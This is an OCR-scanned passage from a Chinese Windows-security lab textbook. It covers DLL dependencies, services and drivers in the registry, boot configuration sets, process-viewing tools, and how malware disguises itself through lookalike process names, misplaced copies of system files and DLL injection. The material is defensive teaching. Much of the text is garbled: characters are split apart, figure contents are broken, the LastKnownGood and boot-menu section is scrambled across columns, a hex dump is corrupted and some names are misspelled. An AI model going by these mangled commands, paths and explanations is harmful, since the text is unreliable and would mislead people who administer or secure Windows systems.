YoukuDesktop. exe 依赖 哪些 DLL 模块 , 左 侧 栏 显示 依赖 的 DLL 模块 列表 , 右 侧 上 栏 显 示 
模块 WININET. dll 自己 所 依赖 的 函数 列表 , 右 侧 下 栏 显 示 模 块 WININET. dll 提供 给 
YoukuDesktop. exe 使 用 的 函数 列表 。 通 过 这 个 列表 ,可 以 静态 分 析出 YoukuDesktop. exe 
的 部 分 功能 。 

(1) VERSION. DLL: Windows NT 系统 版 本 检测 应 用 程序 接口 。 

(2) ADVAPI32. DLL; 可 能 会 进行 注册 表 操 作 。 

(3) WSOCK32. DLL; 具备 网 络 通信 功能 。 

(4) WS2_32. DLL: 具备 网 络 通信 功能 。 

(5) WININET. DLL: 具备 HTTP 浏览 下载 等 功能 ,典型 的 例子 是 浏览 器 .下 载 
工具 。 

(6) WINMM. DLL: 具备 多 媒体 播放 能 力 。 

(7) MFC42U. DLL: 使 用 VC 编写 。 


利用 Explorer Suite 中 的 Task Explorer 工具 查看 运行 中 的 YoukuDesktop. exe 进程 
信息 ,如 图 6-6 所 示 。 


* Task Explorer II 


| Path - 
C:AWINDOWS}system32\winlogon.exe Windows NT Logon Application 
D:\Program Files\Microsoft Office\OFFICE11\WIN,,, — Microsoft Office Word 
C:\WINDOWS\system32\wbemlwmiprvse exe WML 
Program F Ku YoukuChentYoukuDesktop 
D: Program Fies\YouKu\YoukuCient\YoukuMediaC... youku media center service 
D:\Program Files\360\3605afe\deepscan\zhudongf..。 360 主 动 防御 服务 模块 


| Address Description 


YoukuDesktop 00400000 O D:\Program Fies\Youku\YoukuChent\YoulauDesktop..，。 HISE PRK 
WINDOWSLsystem32lw: 


di NT Layer DLL 
Windows NT BASE API Client DLL 
Windows XP USER API Client DLL 
GDI Client DLL 
Version Checking and File Installation Libraries 
Advanced Windows 32 Base API 
Remote Procedure Call Runtime 
Security Support Provider Interface 
Windows Shell Common DI 
Windows NT CRT DIL 
Shell Light-weight Utilty Library 
Windows Socket 2.0 32-Bit DLL 

71410000 l z Windows Socket 2.0 Helper for Windows NT a 
— — — z} > 


6-6 YoukuDesktop. exe 进程 信息 


工具 Task Explorer 显示 的 当前 计算 机 中 所 有 正常 运行 进程 的 详细 信息 ,图 6-6 中 上 部 
列表 显示 所 有 进程 信息 。 其 中 ,process 是 进程 名 ; id 是 进程 标识 符 , 这 里 是 十 六 进 制 显示 
的 整数 (也 就 是 任务 管理 器 中 的 PID 值 ); Address 是 进程 的 内 存 基 地 址 (虚拟 地 址 ) ,用 户 
程序 的 默认 基地 址 为 0x00400000; size 是 进程 所 在 内 存 空 间 大 小 ; Path 是 进程 的 执行 文件 
路 径 ; Description 是 进程 描述 。 

单 击 YoukuDesktop, 则 图 6-6 中 下 部 列表 显示 进程 YoukuDesktop 所 加 载 的 模块 信 
息 , 第 一 行 即 第 一 个 模块 是 YoukuDesktop 的 主 程序 代码 ,其 下 面 的 则 是 YoukuDesktop 中 
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加 载 和 运行 的 DLL 名 、 加 载 地 址 、 大 小 、 文 件 路 径 及 其 描述 。 如 果 正 常 ,显示 所 加 载 的 DLL 
皆 能 在 图 6-5 中 找到 ,否则 不 正常 ,如 DLL 注入 。 

值得 注意 的 是 系统 DLL 如 ntdll. dll、kernel32. dll, user32. dll 和 gdi32. dll 等 的 内 存 基 
地 址 在 不 同 进程 中 是 一 样 的 ,而 系统 DLL 内 存 基地 址 随 系统 内 核 的 不 同 而 不 同 。DLL 文件 
损坏 或 丢失 会 导致 程序 无 法 打开 .计算 机 没 声音 .计算 机 蓝屏 .桌面 无 法 显示 主页 被 修改 为 网 
址 导航 .桌面 图 标 无 法 删除 (重启 同样 不 能 正常 删除 ) 等 。 图 6-7 显示 FireSystem. exe 执行 
时 启动 不 了 ,因为 缺少 DES. dll 文件 ,如 图 6-8 所 示 。 利 用 Dependency Walker 查看 
FireSystem. exe 文件 ,可 以 看 到 DES. dll 的 图 标 为 问号 ,而 右边 显示 的 是 FireSystem. exe 
需要 调用 DES. dll 的 输出 功能 函数 , 且 都 用 红色 图 标 标记 ,意味 着 皆 缺 失 。 


Dependency Walker - [FireSystem. exe] 
mú File Edit View Options Profile Window Help 
SH e F: cA = ¿r? m x 


E inal ` i Entry Point 
F 1 (0x0001) Not Bound 
2 (0x0002) | GetFireName Not Bound 
3 (0x0003) | cetFireangle |Not Bound 
4 (0x0004) | GetFirefilename |Not Bound 
5 (0x0005) | GetFireheight Not Bound 
6 (0x0006) | GetFireid Not Bound 
7 (0x0007) | cetFireidvalue |Not Bound 
GetFirestatus Not Bound 


口 MFC90.DLL 
J- C MSVCR90.DLL 
由 - 口 KERNEL32. DLL 
m- O USER32.DLL 
= O GDI32.DLL 
C ADVAPI32. DLL 
由- 团 KERNEL32. DLL 


GetFirewidth — |Not Bound 
Geteq_gif_id |Not Bound 
11 (Ox000B) | Geteq_gif nane |Not Bound 


图 6-7 FireSystem. exe 无 法 启动 


图 6-8 无 法 找到 组 件 提示 框 


FireSystem. exe 启动 后 如 果 需 要 某 个 DLL 时 ,会 先 在 FireSystem. exe 所 在 文件 目录 
下 查找 该 DLL 文件 ,如 果 找 不 到 , 则 到 系统 目录 下 查找 ,还 是 找 不 到 则 弹出 如 图 6-8 所 示 的 
提示 框 。 

4) 系统 服务 与 驱动 

系统 服务 (system services) 是 指 执行 指定 系统 功能 的 程序 、 例 程 或 进程 ,以 便 支持 其 他 
程序 ,尤其 是 低层 (接近 硬件 ) 程 序 。 服 务 一 般 在 后 台 运 行 , 与 用 户 运行 的 程序 相 比 ,服务 不 
会 出 现 程序 窗口 或 对 话 框 , 可 以 在 任务 管理 器 中 查看 到 。 服 务 的 存在 形式 有 exe 和 dll 两 
种 。 打 开 服 务 管理 窗口 的 步骤 如 下 。 

(1) 在 “运行 "中 输入 “services. msc”, 

(2) 打开 “控制 面板 ”>“ 管 理工 具 ”>“ 服 务 ”。 

(3) 用 Tasklist/svce 命令 查看 。 

服务 管理 窗口 如 图 6-9 所 示 ,显示 的 服务 信息 如 下 。 
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图 6-9 ”服务 管理 窗口 
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Remote Procedure Call (RPC) 
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当 从 此 处 启动 服务 时 ， 修 可 指定 条 返 用 的 自动 数 . 


(1) 服务 名 称 : RpcSs。 显 示 名 称 : Remote Procedure Call(RPC)。 

(2) 描述 : 提供 终结 点 映射 程序 (endpoint mapper) 以 及 其 他 RPC 服务 。 

(3) 可 执行 文件 的 路 径 : C:\WINDOWS\system32\svchost -k RpcSs。 

系统 服务 是 以 动态 链接 库 (dll) 形 式 实现 的 RpcSs. dll, svchost 进程 作为 服务 宿主 。 
(4) 启动 类 型 : 自动 .手动 和 禁用 。 自 动 是 指 服务 进程 随 系统 启动 而 启动 。 

服务 管理 窗口 所 显示 的 信息 皆 来 源 于 HKLM\system\CurrentControlSet\services 中 


< 注册 表 编 辑 器 

文件 (E) 编辑 (E) FEV 收藏 夫 (&) 帮助 (B) 
由 国 Renotehccess A|| 名 称 
自生 RenoteRegistr | ERU 
a @ rpcapd Description 
a E RpcLocator 国 Displayllane 
Rpess 国 Errorcontrol 


自生 RSV = 
& G RTLE8023xp 固 FailurehActions 


由 国 Sass 轿 croup 


由 生 scan 国 Imagepath 

GB SCardSvr objecthane 

aE Schedule a|| Ef ServiceSidType 

aE Secdrv 国 start 

由 国 seclogon Ei Type 

由 国 sENS 
GB 5eremn 


= s 


< m m a 


的 各 个 项 值 。 服 务 RpcSs 的 信息 来 源 于 HKLM\SYSTEM\CurrentControlSet\ Services\ 
RpceSs, 如 图 6-10 所 示 。 


数据 

(数值 未 设置 ) 

提供 终结 点 映射 程序 (endpoint napper) 以 及 其 它 RP 
Remote Procedure Call (RPC) 

Dx00000001 (1) 

00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 od 
COM Infrastructure 
XSystenRoot%\system32\svchost -k rpcss 

NT AUTHORITYANetvorkService 

0x00000001 (1) 

0x00000002 (2) 

0x00000010 (16) 


[ENKEY LOCAL NACHTNENSYSTE NCurrentControlset\Sorvices\Rpess | 
图 6-10 注册 表 服务 项 


图 6-10 中 的 Start 项 值 代 表 该 服务 的 启动 类 型 ,这 比 服务 管理 窗口 中 可 以 设置 的 类 型 
要 多 ,具体 类 型 如 下 。 

A) Start 一 0: 内 核 加 载 时 启动 (安全 模式 )。 

(2) Start=1: 内 核 初始 化 时 启动 。 

(3) Start 一 2: 作为 服务 项 自动 启动 。 
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U) Start 一 3: 管理 员 手 工 启动 服务 。 

(5) Start=4; 禁用 。 

子 项 CurrentControlSet 中 不 仅 包含 系统 服务 信息 ,还 包括 内 核 驱动 信息 。 内 核 驱 动 也 
是 以 服务 的 形式 启动 。 系 统 的 驱动 文件 皆 在 C:\WINDOWS\system32\drivers 下 ,一般 来 
说 可 以 大 致 分 为 两 类 : 硬 驱 动 和 软驱 动 。 硬 驱动 就 是 对 硬件 直接 进行 控制 ; 软驱 动 ,不 直 
接 对 硬件 进行 操作 ,而 是 位 于 硬 驱 动 之 上 的 一 层 更 为 高 级 的 驱动 ,软驱 动 也 称 为 驱动 过 滤 
层 。 如 TCP/IP 软驱 动 (tcpip. sys) 位 于 网 卡 硬 驱动 之 上 。 图 6-11 所 示 为 360AntiHacker. 
sys 的 驱动 信息 , 它 也 属于 软驱 动 ,对 用 户 层 的 函数 调用 进行 拦截 和 过 滤 , 其 Start 值 为 1。 


> Ü .NET CLR Data 

> À -NET CLR Networking 

> À -NET CLR Networking 4.0.0.0 

b- -NET Data Provider for Oracle 

b- NET Data Provider for SqlServer 

b- -NET Memory Cache 40 

> À -NETFramework 

, À (AAD42181-1AF5-44A1-94CD-C8422F105173) 
> | (D974409C-FEB8E-4FB2-AAD6-158C0F0D5E92) 
b- {E7E32389-8A50-4E58-A3C2-045A1A02B4CC} 
-J 13940hci 


> tdo 360AntiHacker 


> À 360Box 
| 


图 6-11 360AntiHacker. sys 内 核 驱动 配置 信息 


Sys 驱动 文件 一 旦 加 载 进入 系统 内 核 , 则 拥有 最 高 的 系统 权限 ,因此 对 系统 十 分 重要 ， 
一 旦 运行 出 现 问 题 ,计算 机 立刻 蓝屏 崩溃 。 杀 毒 软件 和 木马 都 会 将 自己 的 驱动 模块 加 载 入 
系统 内 核 , 以 获取 系统 最 高 权限 。 

在 表 项 HKLM\ SYSTEM 中 一 般 有 3 个 系统 启动 配置 子 项 集 : ControlSet001、 
ControlSet002 和 CurrentControlSet, 其 中 CurrentControlSet 是 ControlSet001 或 
ControlSet002 的 映射 ,这 由 HKLM \SYSTEM\ Select 中 的 Current, Default, Failed 和 
LastKownGood 项 值 决 定 ,如 图 6-12 所 示 。 


注册 表 编 辑 器 


(HERRE) 
0x00000001 (1) 
* 0x00000001 (1) 
š E 0x00000000 (0) 


Enm 
S C Hardware Profiles 0x00000002 (2) 


a Q Services 
C LastKnowGoodRecovery 


我 的 


图 6-12 系统 启动 配置 项 集 


图 6-12 中 所 示 项 值 的 意义 如 下 。 


实践 6 GAE 65 


(1) Current=1 表示 CurrentControlSet 对 应 的 项 集 是 ControlSet001 。 


(2) Default= 


1 表示 CurrentControlSet 默认 对 应 的 项 集 是 ControlSet001。 


(3) Failed=0 表示 失败 或 失效 的 项 集 是 ControlSet000, 没 有 000 项 集 表示 系统 目前 未 


失败 过 ,如 果 系 统 失败 过 则 Failed 不 为 0， 
启 后 ,HKLM\SYSTEM 中 只 会 保留 3 个 子 
(4) LastKownGood 一 2 
计算 机 在 使 用 过 程 中 增 
ControlSet001 ,如 果 系 统 运 行 不 正常 


选择 “最 后 
ControlSet002 的 信息 加 载 系 统 服 务 。 


P Windows 


Eile Edit Yiew VM Iabs 
Bü + | 2 | 


| Service Pack 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 
driver 


To direct input to this VN, 


图 6-13 


在 图 6-13 中 选择 “启动 日 志 
服务 或 驱动 信息 ,并 将 信息 
可 疑 的 服务 或 驱动 被 加 载 。 

利 


: 表示 系统 最 后 

加 、 删 除 或 修改 系统 服务 时 ， 
如 某 些 功能 失效 ,可 以 启动 备用 系统 配置 方案 ,也 就 是 
LastKownGood 所 指 的 项 集 。 图 6-13 所 示 为 计算 机 启动 时 按 下 F8 键 后 的 启动 选 


菜单 . 则 Windows 系统 会 将 加 载 (Loading) 成 功 或 失败 的 
\ 保 存 到 C:\Windows\ntbtlog. txt 的 文件 中 ,有 助 于 分 析 是 否 有 


LR. XueTr. exe( 适 用 32 位 的 系统 ) 可 以 查看 当前 系统 中 已 加 载 的 驱动 信息 , 先 
Restorator 2007 查看 XueTr. exe 文件 的 资源 信息 ,如 图 6-14 所 示 , 其 包 


会 出 现 ControlSet00x 等 ,进入 安全 模式 再 正常 重 
THE, 

-次 正确 配置 的 项 集 是 ControlSet002 。 

只 会 影响 当前 使 用 的 项 集 如 


先 项 菜单 ， 


-次 正确 的 配置 " 则 Windows 系统 依据 LastKownGood 的 值 读 取 对 应 项 集 如 


XP Professional - VMware Workstation 


文件 (E) 编辑 (E) 格式 (0) SEVU #iB (H) 


3 9 14 2011 08:34:45.500 
\WINDOWS\system32\ntoskrnl .exe 
\WINDOWS\system32\hal .dll 
MWINDOWS\system32\KDCOM.DLL 
\WINDOWS\system32\BOOTUID .d11 
ACPI.sys 
\WINDOWS\system32\DRIVERS\WMILIB.SYS 
pci.sys 

isapnp.sys 

compbatt .sys 
\WINDOWS\system32\DRIVERS\BATTC .SYS 
intelide.sys 
\WINDOWS\system32\DRIUVERS\PCIIDEX.SYS 
MountHgr .sys 

ftdisk.sys 

dnload.sys 

dnio.sys 

PartMgr .sys 

VolSnap.sys 

atapi.sys 

wnscsi.sys 
\WINDOWS\system32\drivers\SCSIPORT.SYS 
disk.sys 
\WINDOWS\system32\DRIVERS\CLASSPNP -SYS 
FltHgr .sys 

Sr.sys 

KSecDD .sys 

Ntfs .sys 


click inside or press Ctr1+G. 


启动 选项 菜单 


含 的 资源 KERNEL 中 


实践 教程 


的 167 和 178 是 一 个 PE 文件 的 二 进 制 数 据 流 。XueTr 启动 后 先 解 析 并 提取 资源 167 或 
178, 在 当前 目录 下 生成 xxx. sys 驱动 文件 (文件 属性 为 隐藏 ) 后 ,XueTr 加 载 xxx. sys 驱动 
进入 系统 内 核 , 随 后 即刻 删除 文件 xxx. sys, 所 以 xxx. sys 驱动 文件 在 这 个 启动 过 程 中 看 
不 见 。 


XueTr exe : 4D5A90000300000004000000FFFF0000 MZ.. 
: B8000000000000004000000000000000 ? 


00000000000000000000000000000000 - 
A : 000000000000000000000000E0000000 . 


: OE1FBA0E00B409CD21B8014CCD215468 . 
vB Bs : 69732070726F6772616D2063616E6E€F i 
“Ü 字符 串 : 742062652072756E20696E20444F5320 
| U D) y qata, 中国 ) : 6D6F64 65 2E OD OD OA 24 00 00 00 00 00 00 00 
i $ , : 92D1F43BD6B09A68D6B09A68D6B09A68 . 
b D 光 标 : DFCS8OF 68 D2 B0 9A 68 D6 B0 95 68 9DBO SA 68 M. 
bD 图 标 : 15BFC768D3B09A6815BFC568D7B03A68 . 
O 版 本 : DFC81968A5B09A68DF C8 0E 68 D7 B09A68 
+ = : DF C8 OB 68 D7 B0 9À 68 52 69 63 68 D6 B09A68 
- : 00000000000000000000000000000000 .... 
D: 50450000 4C 01 08 00 3A EB D9 4E 00 00 00 00 
00000000E0000201 0B01 09 00 00 26 05 00 


图 6-14 XueTr 资源 信息 


XueTr 用 其 驱动 模块 在 系统 内 核 内 收集 系统 信息 ,显示 如 图 6-15 所 示 的 各 种 系统 信 
息 ,包括 进程 .内 核 模块 .内 核 .内 核 钩子 等 。 


C: Windows\systen32\ntkrnlpa. .. Microsoft C.. 
C:\Windows\systen32\halnacpi. . Microsoft C.. 
C: \Windows\systen32\kdcon. dl Microsoft C.. 
C:\Windows\systen32\ncupdate. .. Microsoft C.. 
C: MWindows\systen32\PSHED. dll Microsoft C.. 
C: \Windows\systen32\BOOTVID. dll Microsoft C.. 
C: Windows\systen32\CLFS. SYS Microsoft C.. 
C:\Windows\systen32\CI. dl Microsoft C.. 
C:Windows\systen32\drivers\. .. Microsoft C.. 
C: Windows\systen32\drivers\. .. 9 Microsoft C.. 
C:\Windows\systen32\drivers\. ` Microsoft C.. 
C: Windows\systen32\drivers\... Microsoft C.. 
C: Windows\systen32\drivers\... msi Microsoft C.. 
0x88T96FED — C:\Windows\systen32\drivers\. .pei Microsoft C ` 


图 6-15 XueTr 显示 系统 加 载 的 驱动 信息 


图 6-15 显示 的 “驱动 模块 "选项 卡 下 的 驱动 详细 信息 中 ,ntkrnlpa. exe 是 Windows £ 
统 第 一 个 加 载 到 内 核 的 模块 (加 载 次 序 为 0)。 

5) 系统 进程 

Windows 服务 进程 启动 的 顺序 如 下 。 

(1) 当 用 户 登录 到 系统 时 ,就 启动 smss. exe 对 话 管理 器 进程 。 

(2) 由 smss. exe 创建 子 进程 csrss. exe 和 winlogon. exe。 

(3) 由 winlogon. exe 创建 各 个 服务 子 进程 。 

图 6-16 所 示 为 服务 进程 启动 的 详细 流程 。 


smss.exe 对 话 管理 器 
第 一 个 创建 的 进程 
引入 参数 
HKLM\System\CurrentControlSet\Control\Session 
Manager 
装 入 所 青 的 于 系统 (csrss) ， 然 后 winlogon 
csrss.exe Win32 子 系统 
winlogon.exe ”登录 进程 装 入 services.exe 和 lsass.exe 
显示 登录 对 话 框 (“ 输 入 CTRL+ALT+DEL ， 登 录 ) 
HAAGA, ZTE 
HKLM\Software\Microsoft\Windows NT\ 
WinLogon\Userinit 
中 的 进程 (通常 只 是 userinit.exe) 
services.exe 服务 控制 器 : 也 是 几 项 服务 的 出 发 点 
服务 的 开始 进程 不 是 services.exe 的 一 部 分 
(由 HKLMASystem\CurrentControlSet\Services 允 动 ) 
lsass.exe 本 地 安全 验证 服务 器 (打开 SAM) 
userinit.exe 登陆 之 后 启动 。 启 动 外 过 通常 是 Explorer.exe 一 多 
HKLM\Software\Microsoft\ 
Windows NT\CurrentVersion\WinLogon\Shell) 
装 入 配置 文件 ， 恢 复 驰 动 器 标识 符 映 象 ， 然 后 退出 
explorer.exe 和 它 的 孩子 是 所 有 交 z 用 的 创建 者 


图 6-16 服务 进程 启动 流程 


用 工具 procexp. exe 查看 进程 树 , 了 解 各 个 进程 的 派生 关系 即 父子 关系 。 


图 6-17 中 由 wininit. exe 派生 出 的 进程 皆 属 于 服务 进程 ,而 由 explorer. exe 派生 出 的 


进程 属于 用 户 进程 。 几 个 主要 的 进程 介绍 如 下 。 


E interrupts 
Eass. eze 
回 csrss eze 
日 加 wininit. ere 
El services. eze 


回 
= 
[=] 
固 
E 
B 
= 
= 
[= 
[5] 
[Z 
[E 
Z 
[= 


国 
Eisa eze 
m E]esrss. exe 


K Hardware Interrupts a... 

764 K Windows 会 话 管理 着 Microsoft Corporation 
4,956 K Client Server Runtime... Microsoft Corporation 
3,372 K Windows 启动 应 用 程序 Microsoft Corporation 
6,452 E 服务 和 控制 大 应 用 程序 Microsoft Corporation 


3,104 K +š Microsoft Corporation 
53,724 K Client Server Runtime .. Microsoft Corporation 
4,744 E Windows 登录 应 用 程序 Microsoft Corporation 


6-17 Windows 进程 树 


实践 教程 


(1) svchost. exe。 

svchost 进程 作为 服务 宿主 ,加 载 以 dll 形式 存在 的 系统 服务 , Windows XP 中 有 4 个 或 
4 个 以 上 的 svchost 进程 ,Windows 7 有 14 以 上 ,实现 rpcss 服务 (remote procedure call), 
dmserver 服务 (logical disk manager) , DHCP IR% (DHCP client) 等 ,其 存放 目录 为 C:\ 
Windows\System32 ,如 果 出 现在 其 他 目录 下 极 有 可 能 为 病毒 。 

正 是 由 于 系统 中 存在 多 个 svchost. exe, 病 毒 和 木马 才 想 尽 办 法 ,企图 利用 它 的 特性 来 
迷惑 用 户 ,以 达到 感染 、 入 侵 、 破 坏 的 目的 ,如 冲击 波 变种 病毒 w32. welchia. worm。 常 被 病 
毒 冒充 的 进程 名 有 svch0st. exe、schvost. exe、scvhost. exe 等 。 除 了 冒充 进程 名 外 ,Rootkit 
木马 可 能 通过 修改 内 核 结构 的 进程 名 及 其 文件 路 径 而 使 检测 更 加 困难 ,但 是 有 一 个 特征 是 
很 难 伪装 的 ,即将 木马 进程 的 内 核 结 构 中 基地 址 改 为 svchost. exe 的 内 存 加 载 基 地 址 值 如 
0x008F0000 时 (不 同 的 Windows 版 本 ,基地 址 值 不 一 样 ), 则 会 造成 木马 进程 运行 异常 , 因 
此 可 以 通过 检测 svchost. exe 的 基地 址 异常 来 发 现 可 疑 的 进程 ,利用 工具 Task Explorer 
查看 。 

(2) rundll32. exe, 

rundll32. exe 用 于 在 内 存 中 运行 DLL 文件 ,它们 会 在 应 用 程序 中 被 使 用 。 这 个 程序 对 
系统 的 正常 运行 是 非常 重要 的 。 注 意 : rundl132. exe 和 rundll32. exe 相似 ,但 是 rundl132 
. exe 是 W32. Miroot. Worm 病毒 ,该 病毒 允许 攻击 者 访问 用 户 的 计算 机 ,窃取 密码 和 个 人 
数据 。 

使 用 方法 为 : 


> Rund1132. exe DLLname, Functionname [Arguments] 


例如 : 


rund1132. exe user32. dll, LockWorkStation 


即 rundll32. exe 运行 user32. dll 中 的 LockWorkStation 函数 ,用 于 锁定 计算 机 。 
图 6-18 所 示 为 user32. dll 的 输出 函数 列表 。 


一 目 Noou 
$ 日 G0132DLL 
由 - 加 KERNEL32.DLL 
H-2 ADVAPI32.DLL 
-3 CFGMGR32.DLL 
30 MSIMG32.DLL 
EË SZ) POWRPROFDLL 
由 -8 加 WINSTADLL 


6-18 user32. dll 的 输出 函数 列表 


(3) explorer. exe, 
资源 管理 器 ,explorer. exe 进程 默认 是 和 系统 一 起 启动 的 ,其 对 应 执行 文件 的 路 径 为 
C:\Windows 目录 , 除 此 之 外 则 为 病毒 。 


当 确认 系统 中 存在 病毒 ,但 是 通过 任务 管理 器 查看 系统 中 的 进程 时 又 找 不 出 异样 的 进 
程 ,这 说 明 病 毒 采用 了 一 些 隐藏 措施 ,总 结 出 来 有 以 下 三 种 方法 。 

中 以假乱真 : 系统 中 的 正常 进程 有 svchost. exe, explorer. exe, iexplore. exe, 
winlogon. exe 等 。 可 能 发 现 过 系统 中 存在 这 样 的 进程 svchOst. exe, explore. exe, 
iexplorer. exe、winlogin. exe。 这 是 病毒 经 常 使 用 的 伎俩 ,目的 就 是 迷惑 用 户 的 眼睛 。 通 常 
它们 会 将 系统 中 正常 进程 名 的 o 改 为 0,1 改 为 i,i 改 为 j,1 改 为 1, 然后 成 为 自己 的 进程 名 ， 
仅仅 一 字 之 差 , 意 义 却 完全 不 同 。 又 或 者 多 一 个 字母 或 少 一 个 字母 ,例如 explorer. exe 和 
iexplore. exe 本 来 就 容易 搞 混 , 再 出 现 个 iexplorer. exe 就 更 加 混乱 了 。 如 果 用 户 不 仔细 ,一 
般 就 忽略 了 ,病毒 的 进程 就 逃 过 了 一 动 。 

O 偷梁换柱 : 如 果 一 个 进程 的 名 字 为 svchost. exe, 和 正常 的 系统 进程 名 分 毫 不 差 。 其 
实 它 只 是 利用 了 任务 管理 器 无 法 直观 地 查看 进程 对 应 可 执行 文件 这 一 缺陷 。 正常 的 
svchost, exe 进程 对 应 的 可 执行 文件 位 于 C:\WINDOWS\system32 目录 下 ,如 果 病 毒 将 自 
身 复制 到 C:\WINDOWS\ 中 ,并 改名 为 svchost. exe, 运 行 后 .在 任务 管理 器 中 看 到 的 也 是 
svchost. exe, 和 正常 的 系统 进程 无 异 。 

O 借 尸 还 魂 : 所 谓 的 借 尸 还 魂 就 是 病毒 采用 了 进程 插入 技术 ,将 病毒 运行 所 需 的 dll 
文件 插入 正常 的 系统 进程 中 ,表面 上 看 无 任何 可 疑 情况 ,实质 上 系统 进程 已 经 被 病毒 控制 
了 ,除非 借助 专业 的 进程 检测 工具 ,否则 要 想 发 现 隐藏 在 其 中 的 病毒 是 很 困难 的 。 


5. 实践 操作 及 步骤 


1) 进程 查看 

利用 不 同 的 工具 查看 360 杀毒 进程 360sd. exe, 不 同 的 工具 能 显示 同一 进程 的 不 同方 
面 的 信息 。 

(1) 任务 管理 器 (Windows XP 或 Windows 7) 。 

(2) 360 管理 工具 。 

(3) XueTr。 

(4) ExplorerSuite。 

(5) procexp. exe, 

(6) tasklist/svec 命令 查看 。 

2) 启动 或 关闭 防火 墙 服务 

启动 或 关闭 防火 墙 服务 可 以 通过 以 下 四 种 途径 实现 。 

(1) 桌面 图 标 “ 网 络 ”右键 菜单 “属性 ”, 打 开 防 火 墙 设置 页 面 ,启动 或 关闭 即 可 ,如 图 6-19 
所 示 。 如 果 在 服务 管理 器 中 禁用 了 防火 墙 服务 , 则 不 会 出 现 防 火 墙 设置 页 面 。 

Windows 7 系统 可 以 在 控制 面板 打开 Windows 防火 墙 的 设置 界面 。 

(2) 服务 管理 器 : 运行 services. msc 启动 服务 管理 器 ,如 图 6-20 所 示 。 

6-20(a) 是 Windows XP 系统 的 防火 墙 服 务 SharedAccess, 图 (b) 是 Windows 7 系统 
的 防火 墙 服务 MpsSvc, 通 过 设置 服务 状态 来 启动 或 关闭 防火 墙 。 

(3) 注册 表 : 对 防火 墙 的 启动 或 关闭 修改 都 会 反映 到 在 注册 表 中 对 应 的 项 值 中 ,直接 
修改 以 下 项 值 start。 

Windows XP; HKLM\system\CurrentControlSet\services\SharedAccess。 
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Windows 7; HKLM\system\CurrentControlSet\services\ MpsSvc, 
(4) 命令 行 SC: SC 是 用 于 与 服务 控制 管理 器 和 服务 进行 通信 的 命令 行程 序 ,命令 格式 


如 下 。 


sc < server > [ command] [ service name] < option1 >< option2 >… 


查询 服务 的 状态 : 


sc query >> c:\sc. txt 


显示 以 下 信息 (Windows XP): 


停止 服务 : 


启动 服务 : 


6. 思考 题 
为 什么 需要 用 不 同 的 工具 查看 系统 中 运行 着 的 进程 ? 


Kik 


Windows 账 户 与 访问 控制 


1. 实践 目的 
掌握 Windows 操作 系统 中 安全 账户 的 设置 方法 。 
2. 实践 环境 


连 入 Internet 的 计算 机 一 台 , 安 装 Windows XP、Windows 7 或 
Windows 8 等 操作 系统 。 


3. 名 词 解释 


1) 账户 

账户 分 为 管理 员 账 户 和 一 般 账户 。 管 理 员 账 户 能 够 看 见 所 有 东西 ， 
并 且 拥 有 所 有 权限 ,简单 地 说 就 是 可 以 对 计算 机 做 任何 修改 。 而 一 般 账 
户 只 能 用 于 浏览 ,不 能 对 计算 机 做 出 任何 修改 ,并 且 硬 盘 的 有 些 文件 是 
不 允许 浏览 的 ,例如 系统 文件 还 有 管理 员 设 定 的 一 些 隐私 文件 。 二 者 的 
作用 ,管理 员 是 用 来 设 定 和 修改 计算 机 的 相关 操作 ,一 般 账户 就 是 用 做 一 
般 浏览 ,不 能 做 出 修改 。 相 对 来 说 ,管理 员 设 定 一 般 账户 是 为 了 让 客人 或 
者 计算 机 借 给 别人 用 的 时 候 不 透露 自己 的 隐私 或 者 修改 自己 的 设置 。 

2) 权限 

权限 (Permission) 是 针对 资源 而 言 的 。 也 就 是 说 ,设置 权限 只 能 是 
以 资源 为 对 象 , 即 “ 设 置 某 个 文件 夹 有 哪些 用 户 可 以 拥有 相应 的 权限 ”， 
而 不 能 是 以 用 户 为 主 , 即 “设置 某 个 用 户 可 以 对 哪些 资源 拥有 权限 ”"。 这 
就 意味 着 “权限 ”必须 针对 “资源 ”而 言 , 脱 离 了 资源 去 谈 权 限 毫 无 意义 。 
在 提 到 权限 的 具体 实施 时 ,“ 某 个 资源 ”是 必须 存在 的 。 利 用 权限 可 以 控 
制 资源 被 访问 的 方式 ,如 User 组 的 成 员 对 某 个 资源 拥有 “ 读 取 ” 操 作 权 
PR Administrators 组 成 员 拥 有 “ 读 取 十 写 入 十 删除 ”操作 权限 等 。 

3) 访问 令 牌 

访问 令 牌 属于 Windows 的 内 核对 象 .属于 保护 对 象 , 当 用 户 登 录 到 
一 台 计算 机 时 ,登录 进程 会 验证 用 户 的 登录 凭据 ,如 果 验 证 成 功 , 登 录 进 
程 会 返回 一 个 对 应 用 户 的 SID( 安 全 标识 符 ) 和 一 个 用 户 的 安全 组 SID 列 
表 。 计 算 机 会 根据 这 些 信 息 为 当前 登录 的 用 户 生成 一 个 访问 令 牌 ,该 令 


牌 会 跟随 用 户 执行 每 一 个 线程 与 进程 。 

4) 访问 控制 策略 

访问 控制 策略 是 网 络 安全 防范 和 保护 的 主要 策略 ,其 任务 是 保证 网 络 资源 不 被 非法 使 
用 和 非法 访问 。 各 种 网 络 安全 策略 必须 相互 配合 才能 真正 起 到 保护 作用 ,而 访问 控制 是 保 
证 网 络 安全 最 重要 的 核心 策略 之 一 。 访 问 控制 策略 包括 人 网 访问 控制 策略 、 操 作 权限 控制 
策略 、 目 录 安 全 控制 策略 、 属 性 安全 控制 策略 、 网 络 服务 器 安全 控制 策略 、 网 络 监测 与 锁定 控 
制 策略 以 及 防火 墙 控制 策略 7 个 方面 的 内 容 。 


4. 预备 知识 


1) 用 户 账户 控制 

用 户 账户 控制 (User Account Control, UAC) 是 Windows Vista( Vista 的 正式 名 称 为 
Windows NT 6. 0, Windows 7 为 Windows NT 6. 1) 中 一 组 新 的 基础 结构 技术 ,可 以 帮助 阻 
止 恶意 程序 (有 时 也 称 为 恶意 软件 ) 损 坏 系统 ,同时 也 可 以 帮助 组 织 部 署 更 易于 管理 的 平台 。 

使 用 UAC, 应 用 程序 和 任务 总 是 在 非 管理 员 账 户 的 安全 上 下 文中 运行 ,但 管理 员 专 门 
给 系统 授予 管理 员 级 别 的 访问 权限 时 除外 。UAC 会 阻止 未 经 授权 应 用 程序 的 自动 安装 , 防 
止 无 意 中 对 系统 设置 进行 更 改 。 

